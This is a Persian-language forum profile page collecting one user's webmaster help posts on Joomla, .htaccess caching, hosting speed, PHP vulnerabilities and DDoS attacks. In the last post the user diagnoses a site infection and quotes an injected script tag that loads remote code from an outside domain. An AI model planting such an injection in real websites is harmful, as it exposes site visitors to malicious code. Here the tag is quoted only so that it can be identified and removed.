phptik

کاربران
  • تعداد ارسال ها

    74
  • تاریخ عضویت

  • آخرین بازدید

تمامی ارسال های phptik

  1. سیستم مدیریت و محتوا جوملا یکی از محبوب ترین ابزار های راه اندازی سایت ها و پرتال ها می باشد؛اما در عین حال وجود آسیب پذیری هایی مثل SQL Injection و اجازه اجرای کد های مخرب در نسخه های قبلی این سیستم مدیریت و محتوا نشان داد که محبوبیت این سیستم نه صرفه برای کاربران عادی بلکه برای هکر ها نیز به طرز چشمگیری افزایش پیدا کرده است. در سال ۲۰۱۲ یک حمله سازمان بافته بزرگ DDoS به بانک های آمریکایی آغاز شد؛ این گروه خود را “Izz ad-Din al-Qassam Cyber Fighters” نامید و عملیات گسترده دیداس خود را عملیات”ابابیل” نامید و این عملیات در جواب نمایش تریلر فیلم بحث برانگیزی در خصوص حضرت محمد(ص) بود. این حملات بین ۶۰ تا ۱۰۰ گیگابیت در ثانیه انجام شد که باعث ضرر های سنگین مالی و افت سهام بعضی بانک ها شد. برای راه اندازی چنین حمله سنگینی هکر ها ار یک شبکه بات گستره استفاده کردند اما چیزی که مشخص بود تفاوت این حمله و نوع بات آن با بات های دیگر و قدیمی بود؛در این نوع حمله از یک سرور اصلی به عنوان مرکز کنترل استفاده شد که “itsoknoproblembro” نام گرفت. این سرور ابزار های مورد نیاز انجام حمله را از طریق باگ های PHP در سرور های مختلف دنیا قرار می داد؛ بدین صورت سرور ها بدون اینکه صاحبان آنها متوجه شوند به عنوان ابزار های قوی( بسیار قوی تر از بات نت پی سی های خانگی) دیداس مورد استفاده قرار می گرفتند که به سرور های نفوذ شده brobot می گفتند. این ابزار های حمله توسط PHP نوشته شده بودند در سرور های brobot اجرا می شدند و پارامتر هایی را توسط URL به وب سایت های هدف ارسال میکردند؛ این حملات به حملات HTTP مشهور هستند که در لایه ۷ (نرم افزاری) انجام می شود. از آنجایی که حملات از سرور هایی در چین ارسال می شد سریعا مکاتباتی جهت رفع و پاکسازی سرور ها از بانک های آمریکا برای مقامات چینی ارسال شد و پس از پاکسازی مشخص شد تمام این حملات توسط فایل های PHP که به صورت ناخواسته قرار گرفته بودند انجام شد. این مورد اولین و بزرگترین حمله گزارش شده از طریق بات نت های سروری به وسیله PHP بود. در بررسی اولیه یک وجه تشابه در بین سایت های مورد نفوذ قرار گرفته وجود داشت و آن استفاده جوملا به عنوان سیستم مدیریت و محتوا بود و این یعنی حملات گسترده DDoS به واسطه جوملا. در سال ۲۰۱۳ محققان متوجه سو استفاده های عظیم از سایت های جوملایی جهت ایجاد بات نت ها و روش های مختلف فیشینگ و دیگر جرائم اینترنتی شدند و محققان تخمین می زنند حدود ۴۰۰٫۰۰۰ سایت جوملایی با باگ های امنیتی و کلمه عبور های ضعیف وجود دارند که می تواند به عنوان یک بات خطر ناک و غیر قابل کنترل مورد استفاده قرار گیرند. شرکت امنیتی Prolexic در ژانویه ۲۰۱۳ گزارشی منتشر کرد و اعلام کرد حجم حملات دیداس از طریق سایت های جوملایی به شدت افزایش یافته است. جوملا در ۳۰ ژانویه ۲۰۱۳ یک پتچ امنیتی برای تمامی نسخه های جوملا منتشر کرد که اجازه آپلود ناخواسته را برطرف می کرد و هکر ها نمی توانستند فایل های PHP خود را جهت حملات دیداس به جوملا تزریق کنند اما تعداد سایت های جوملایی که هنوز پتچ نکرده اند بسیار زیاد است و هم اکنون نیز به عنوان یک بات عظیم مورد استفاده قرار میگیرند. منبع: DDoS – دیداس
  2. بله سرعت سایتتان پایین است : HostTracker - Http result for http://energycity.ir میانگین سرعت دریافت اطلاعات 5.44 kB/s می باشد که کم است؛ حجم سایت حدود 3MB می باشد و با سرعت دانلود بالا مسلما سایت دیر لود می شود. تعداد فایل های .js سایتتان خیلی زیاد است. همچنین فایل های استاتیک مثل عکس و جاوا و.. کش نمی شوند ؛ یعنی کاربر با رفتن به صفحات داخلی باید تمامی فایل ها را دوباره از سرور لود کنند که باعث مصرف بیشتر پهنای باند شما و کاهش سرعت لود صفحات داخلی سایت خواهند شد؛ برای فعال کردن کش از کد زیر استفاده کنید: ## EXPIRES CACHING ## <IfModule mod_expires.c> ExpiresActive On ExpiresByType image/jpg "access 1 year" ExpiresByType image/jpeg "access 1 year" ExpiresByType image/gif "access 1 year" ExpiresByType image/png "access 1 year" ExpiresByType text/css "access 1 month" ExpiresByType text/html "access 1 month" ExpiresByType application/pdf "access 1 month" ExpiresByType text/x-javascript "access 1 month" ExpiresByType application/x-shockwave-flash "access 1 month" ExpiresByType image/x-icon "access 1 year" ExpiresDefault "access 1 month" </IfModule> ## EXPIRES CACHING ##
  3. این ارور نیست ؛ صفحه پیشفرض Wamp هست, فایل index.php فعلی را حذف و از فایل زیپ جوملا دوباره قرار دهید
  4. سرعت هاستت بد نیست و خوبه , اما طراحی سایتت افتضاحه !! البته افتضاح نه به معنی زیبایی و ظاهری, به این معنی که اصلا سایتت بهینه شده نیست, اگه بخوام کل مواردی که سایتت تو اونها مشکل داره رو کمک کنم حل کنی خیلی طول میکشه اما خلاصه میگم و تو گوگل راهکارشو پیدا کن: Gzip غیر فعال کش فایل های استاتیک مثل عکس و جاوا و .. غیر فعال تو سایت از سایز اصلی عکس استفاده کن, یعنی وقتی عکست طول و عرضش 500*500 هست, به جای اینکه تو HTML سایزشو کم کنی به 300*300 ؛ خود سایز اصلی عکسو کم کن, عکس ها هم بهینه نیست. تو سایت زیر Pagespeede سایتت 29 درصد هست! باید ببریش بالا حد اقل بالای 80 درصد,
  5. اگه اسکریپت هست و احتمالا نیاز به rewrite url داره باید روش زیر در پیش بگیرید: اول باید رو ومپ کلیک کنید و از منو باز شده Apache و سپس Apache modules و سپس rewrite module را فعال کنید و ومپ را ریستارت کنید. مطمئن باشید اسکریپت شما دارای فایل .htaccess نیز هست. اگر یک فایل html ساده هست مطمئن شوید پسوند فایل درست است ؛html Or htm و فایل در فولدر abarghoei وجود داشته باشد. به بزرگی و کوچک بودن حروف هم حساس است. نام فایل باید کلا حروف کوچک باشد
  6. با سلام, اگه کارتون قانونیه و سایت هایی مثل فروش vp n ندارید زرین پال بهترین گزینه هست! من چند ساله از زرین پال استفاده می کنم فکر کنم اولین سایت سرویس واسطه ایرانی هست, شرکت معتبر و ثبت شده هست و اگه در خواست بدید کارت عابر زرین کارت(وابسطه به بانک آینده) بهتون میده که متصل به شبکه شتاب هست. الان بیشتر از 4 ماهه که برای تسویه حساب هیچ کارمزدی نمی گیره, نرم افزار اندروید و همچنین امکان استفاده از usd کد خطوط همراه رو داره, اگه اعتماد براتون مهمه معتبر تر از زرین پال پیدا نمی کنید.
  7. محتویات این htaccess را اینجا بگذارید تا بررسی شود
  8. بهتره تو گوگل سرچ کنید
  9. از فایل هایی که گفتی تو فولرد کش هست یه بک آپ بگیر و بعد حذفشون کن
  10. اول باید دیتابیس انتخاب کنی و بعد import کنید
  11. فایل functions.php که در همه صفحات اینکلود شده را ارسال کنید
  12. سلام دوست عزیز, دلایل مختلفی می تونه داشته باشه,اون فایلی که این ارور میده را برای من ارسال کنید
  13. اینطوری نمیشه گفت خوبه یا نه, معیار های زیادی وجود داره, که کیفیت خود هاست ی***ه, باید از مشتریانش بپرسید
  14. صد درصد به هاست بستگی داره, از طریق http://www.host-tracker.com و سایت های مشابه می تونید سرعت سایتتونو بررسی کنید
  15. Options +FollowSymlinks RewriteEngine on rewritecond %{http_host} ^domain.com [nc] rewriterule ^(.*)$ http://www.new-site.com/$1 [r=301,nc]
  16. دوست عزیز برنامه نویسی چیزی نیست که یک ماهه یاد بگیرید, علاوه بر مطالعات نیاز به تجربه داره, یعنی شما باید حد اقلش دو یا سه تا اسکریپت بنویسی تا به اصطلاح کار بیاد دستت,با مشکلات و باگ ها مواجه بشی و خلاصه تجربه هم می خواد!
  17. شما وقتی سایتو دوباره ثبت می کنی باید فایلو دوباره دانلود و تو هاست آپلود کنی و نمی تونی از فایل قبلی برای وریفای استفاده کنی
  18. سلام, هیچ ربطی به جدول دیتابیس و session ها نداره, فایل ایندکس سایتت با یه برنامه غیر استاندارد ویرایش و ذخیره شده, با یه برنامه مثل notepad++ ویرایشش کن, بعد از منو encoding تیک گزینه دوم یعنی encoding in utf-8 without bom انتخاب کن و بعد ذخیره, مشکلت حل میشه
  19. به احتمال زیاد فایل .htaccess آپلود نکردید! خطا به همین دلیل است
  20. ُسلام دوست عزیز, نمی خوام مستقیم بگم کی خوبه یا بده, بهترین کار اینه که تو گوگل سرچ کنی هاست DDoS protection ! هاست هایی هستند که بتونند جلوی حملات دیداس رو تا حد بالایی بگیرند و اکانتتون مسدود نشه, البته به همراه ضمانت
  21. مشکل از سرورتون هست! با http://www.host-tracker.com چک کنید
  22. این نسخه دارای باگ های امنیتی خطرناک می باشد که البته در نسخه ۵٫۳ کاملا برطرف شده استXSS ,DoS , Overflow, Bypassفقط بخشی از این باگ ها هستند, برای مثال تابع gdImageCreateFromXpm در gdxpm.c به هکر اجازه می دهد تا یک حمله DoS ترتیب دهد و باعث کرش شدن اسکریپت شود و یا باگ OpenSSL که منجر به دسترسی از راه دور هکر به اطلاعات RAM سرور شده که می تواند اطلاعات محرمانه ای را از این طریق بدست بیاورد. در لینک زیر می توانید تمامی این باگ ها را مشاهده کنید : PHP PHP version 5.2.17 : Security vulnerabilities php 5.2 همچنین به صورت رسمی از نسخه های جدید سی پنل حذف شده و پشتیبانی نمیگردد. منبع:سنترال هاستینگ
  23. اگر شما هم از قربانیان حملات دیداس بودید حتما از خودتان می پرسید باید چی کار کنم؟! کم نیستند تعداد سایت های ایرانی که به دلیل دیداس ساسپند می شوند! اما واقعا چگونه می شود فهمید دیداس شده اید؟ حملات دیداس چیست؟ متاسفانه بسیاری از وبمسترها به دلیل عدم اطلاعات کافی در خصوص حملات DDoS ممکن است دست به اشتباهاتی بزرگ بزنند و یا حتی مورد سو استفاده قرار گیرند,در بعضی از تالار های گفتگو تاپیک های مشاهده می شود که وب سایتشان به دلیل حملات DDoS ساسپند می شوند! بعضی ها هم به نقل از سرویس دهنده خود مدعی می شوند که حملات از نوع UDP بوده اند در صورتی که سایتشان بر روی آی پی اشتراکی قرار داشته است! تمامی حملات DDoS به روش های معمول UDP یا TCP+SYN انجام می شود, من سعی دارم در این مطلب کوتاه به چند نکته در این خصوص اشاره کنم تا سطح اطلاع وبمسترها نسبت به این حملات افزایش پیدا کند. نکته اول اینکه حملات نوع UDP بر روی IP انجام می شود و اگر IP شما اشتراکی می باشد سرویس دهنده نمی تواند بگوید که به سایت شما حمله شده! ممکن است هدف هر وب سایتی بوده و این حملات برای از کار انداختن و نال کردن IP و تمامی سایت های روی IP هدف مورد استفاده قرار می گیرد !مگر اینکه وب سایت شما دارای IP اختصاصی باشد. به غیر از UDP معمول ترین روش حمله TCP+SYN می باشد که بر روی وب سایت رخ می دهد, این حملات حتی در زمانی که وب سایت شما ساسپند شده به سرور می رسد و تا وقتی که وب سایت شما از سرور حذف نشده باشد به همان اندازه قبل از ساسپند شدن خطر ناک است, یعنی هاستینگ شما با ساسپند کردن فقط به اتکر( حمله کننده) می فهماند که وب سایت شما تسلیم شده است!وگرنه برای اتکر فرقی نمی کند اکانت شما در چه حالتی باشد! گاهی اوقات واقعا حمله ای در کار نیست, برای مثال یکی از مشتری های ما به دلیل حملات DDoS در چند هاستینگ ساسپند شده بود, وقتی به سرور ما منتقل شد آنتی شلر و آنتی ویروس سرور یکسری فایل ها را مخرب شناسایی کردند که تعداد درخواست های زیادی ارسال می کردند و با پاکسازی آنها مشکل دوست عزیزمان حل شد و هاستینگ ها به اشتباه فکر می کردند سایت مورد حمله واقع شده! متاسفانه در بعضی از هاستینگ ها صداقت فراموش شده و گاهی اوقات به دلیل افزایش مصرف منابع توسط یک وب سایت, به وبمستر اعلام می کنند که سایت شما مورد حمله قرار گرفته! یکی از نکات مهم جلوگیری از حملات دیداس می باشد, به دلیل عدم آشنایی بعضی از افراد فکر می کنند با استفاده از یکسری تنظیمات و اسکریپت ها می توان جلوی حملات را گرفت! شاید این قضیه تا حدی درست باشد اما مهم درک حمله DDoS می باشد. حملات معیار های مختلفی از قبیل متود(UDP-TCP SYN-Smurf و …) و تعداد IP های بات , تعداد پکت های ارسالی در ثانیه و حجم پکت ها می باشد می باشد, شاید بسیاری از حملات سطح پایین را که صرفا مقداری مصرف منابع را بالا می برند بشود با مسدود کردن آی پی در سطح سرور (نه وب سایت) مهار نمود ,اما بعضی حملات ممکن است حتی با بستن پورت هم مهار نشوند : آیا بستن پورت UDP به جلوگیری از DDoS کمک می کند؟ البته بعضی ها به روش های نوین ترین از DDoS Protection دست می زنند,کلود فلر یکی از این گزینه هاست که وب مسترها برای حافظت از وب سایت خود از آن استفاده می کنند,علی رغم امکانات خوب کلودفلر اما نکاتی نیز وجود دارد که باید مورد اهمیت قرار بگیرند: سرویس کلودفلر (CloudFlare) چیست؟ منبع: سنترال هاستینگ
  24. بازدید کننده بالا , حجم بالای سایت ,دانلود یا آپلود فایل های حجیم و همچنین حملات DDoS , همشون می تونند در اتمام پهنای باند شما سهیم باشند
  25. به دلیل اسکریپتیه که تو سایت لود میشه <script type="text/javascript" src="http://citibankshortsale.com/counter.php?id=1949917"></script> اگه اینو حذف کردید و دوباره اومد احتمالا یه فایل php مخرب هم تو سایت هست که این کد دوباره میسازه